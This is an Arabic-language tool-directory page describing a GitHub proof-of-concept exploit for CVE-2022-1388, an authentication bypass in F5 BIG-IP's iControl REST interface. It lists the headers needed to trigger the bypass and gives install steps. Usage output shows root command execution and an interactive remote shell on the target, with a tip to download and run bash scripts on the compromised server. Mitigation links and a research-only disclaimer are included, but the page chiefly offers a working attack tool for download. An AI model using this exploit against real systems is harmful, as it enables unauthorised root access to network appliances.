Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-1388-POC — إثبات مفهوم محسّن لـ CVE-2022-1388 مع شل تفاعلي | Kitploit
أدوات/GitHubGitHub/psychosec2/cve-2022-1388-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubpsychosec2/cve-2022-1388-poc

CVE-2022-1388-POC

إثبات مفهوم محسّن لـ CVE-2022-1388 مع شل تفاعلي

عرض المستودع
144منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-1388 Poc بواسطة PsychoSec

POC محسّن لـ CVE-2022-1388 الذي يؤثر على منتجات F5 المتعددة.

هذه نسخة محسّنة من إثبات المفهوم لـ Horizon3 لـ CVE-2022-1388: https://github.com/horizon3ai/CVE-2022-1388

تحتوي هذه النسخة على تحسينات متعددة بالإضافة إلى شِل تفاعلي لتشغيل الأوامر عن بُعد.

التحليل الفني:

يمكن العثور على تحليل Horizon3 الفني للسبب الجذري للثغرة في مدونتهم: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

الملخص:

الشروط الضرورية لطلب استغلال هذه الثغرة:

  1. يجب أن يتضمن رأس الاتصال X-F5-Auth-Token
  2. يجب أن يكون رأس X-F5-Auth-Token موجودًا
  3. يجب أن يكون رأس المضيف localhost / 127.0.0.1 أو يجب أن يتضمن رأس الاتصال X-Forwarded-Host
  4. يجب تعيين رأس المصادقة باسم مستخدم المشرف وأي كلمة مرور

المتطلبات:

  • git
  • pip3
  • python3

التثبيت:

root@kitploit:~
git clone https://github.com/PsychoSec2/CVE-2022-1388-POC.git
cd ./CVE-2022-1388-POC
pip3 install -r requirements.txt
python3 ./CVE-2022-1388.py -h

الاستخدام:

اختبار الهدف:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -t
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!

Use -s option to run an interactive shell.

الشِل التفاعلي:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -s
Running interactive shell..

root@f5-localhost: /var/service/restjavad$ 

لا يتطلب استخدام أي اتصال TCP عكسي أو مستمعين.

الخيارات:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -h
Usage: CVE-2022-1388.py [options]

Options:
  -h, --help         Show this help message.
  -u URL, --url=URL  The IP address of the target.
  -t, --test         Test target for CVE-2022-1388.
  -s, --shell        Run an interactive shell.

مهم:

يرجى ملاحظة أنه أثناء تشغيل الشِل التفاعلي على نظام غير محدث، قد لا تعمل بعض الأوامر والقواعد النحوية أو تعطيك النتيجة المتوقعة. من المحتمل أن يكون هذا بسبب استخدام JSON في طلبات واستجابات واجهة برمجة التطبيقات للخادم. لتجنب أي مشاكل، حاول ألا تستخدم الأحرف الفردية الشائعة في بناء جملة JSON مثل النقطتين والفاصلة والأقواس المتعرجة والأقواس المربعة، وخاصة علامات الاقتباس عند استخدام الشِل التفاعلي. يجب أن تكون أي بناء جملة JSON داخل الأمر منظمة بالتنسيق.

قد يؤدي استخدام أي نوع من بناء جملة JSON غير المنظم داخل الأمر إلى طلب API مشوه للخادم وقد يتركك بلا: إخراج أمر، أو عدم تنفيذ شيء، أو قد يطردك من النص البرمجي بايثون بالكامل. هذا يجعل بعض الأوامر غير قابلة للاستخدام للأسف. للتغلب على هذه المشكلة، يمكنك بدلاً من ذلك كتابة نص برمجي bash، وتنزيله على الخادم، وتنفيذه باستخدام الشِل التفاعلي. كما أنه ليس من الممكن تغيير الدلائل باستخدام الأمر 'cd'.

  • مقدمة إلى JSON: https://javaee.github.io/tutorial/jsonp001.html

في أي حال، يجب أن تظل قادرًا على الحصول على إخراج الأوامر الأساسية. إذا لم تحصل على إخراج أمر، فهذا لا يعني أن الأمر لم يتم تنفيذه. ومع ذلك، سيتعين عليك معرفة ذلك باستخدام تحليلك الخاص.

التخفيفات:

قم بالتحديث إلى أحدث إصدار أو خفف باتباع التعليمات الواردة في إعلان أمان F5

  • https://support.f5.com/csp/article/K23605346

إخلاء المسؤولية:

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا إذن صريح. القائمون على المشروع غير مسؤولين ولا يتحملون أي مسؤولية عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة